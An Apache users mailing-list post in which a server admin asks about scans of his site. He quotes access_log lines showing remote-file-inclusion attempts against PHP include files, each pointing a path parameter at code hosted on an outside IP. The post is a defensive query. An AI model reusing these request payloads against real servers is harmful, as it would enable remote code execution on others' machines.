Hello, I am new to Apache and am running version 1.3.29 on OpenBSD. Recently crackers and script kiddies have been scanning my server. I don't think any one has broken in yet. On April 2nd I noticed some interesting entries in my access_log, error_log, and agent_log. For exmaple: A small part of access_log: 70.84.195.34 - - [02/Apr/2007:20:51:21 -0500] "GET /cnl_prod/pmb/opac_css/includes/resa_func.inc.php?class_path=http://210.18.229.21/statistic .txt?&/ HTTP/1.1" 404 254 70.84.195.34 - - [02/Apr/2007:20:51:21 -0500] "GET /pmb/opac_css/includes/resa_func.inc.php?class_path=http://210.18.229.21/statistic.txt?&/ H TTP/1.1" 404 245 70.84.195.34 - - [02/Apr/2007:20:51:21 -0500] "GET /opac_css/includes/resa_func.inc.php?class_path=http://210.18.229.21/statistic.txt?&/ HTTP/ 1.1" 404 241 70.84.195.34 - - [02/Apr/2007:20:51:21 -0500] "GET /limbo/classes/adodbt/sql.php?classes_dir=http://210.18.229.21/statistic.txt?&/ HTTP/1.1" 4 04 234 70.84.195.34 - - [02/Apr/2007:20:51:22 -0500] "GET /eqdkp/includes/dbal.php?eqdkp_root_path=http://210.18.229.21/statistic.txt?&/ HTTP/1.1" 40 4 229 70.84.195.34 - - [02/Apr/2007:20:51:22 -0500] "GET /includes/db_adodb.php?baseDir=http://210.18.229.21/statistic.txt?&/ HTTP/1.1" 404 227 The person from 70.84.195.34 attempted to get 142 different non-existent documents from my server. All the attempts resulted in error code 404. All the entries in the agent_log for 70.84.195.34 look like this: Colonela WebSecure2791 I Googled it and found nothing. So here's my question. What is "Colonela WebSecure2791"? Thanks in advance for your feedback. -- Sean Malloy Registered GNU/Linux User #417855 Happy Hacking! ;-) --------------------------------------------------------------------- The official User-To-User support forum of the Apache HTTP Server Project. See <URL:http://httpd.apache.org/userslist.html> for more info. To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx " from the digest: users-digest-unsubscribe@xxxxxxxxxxxxxxxx For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx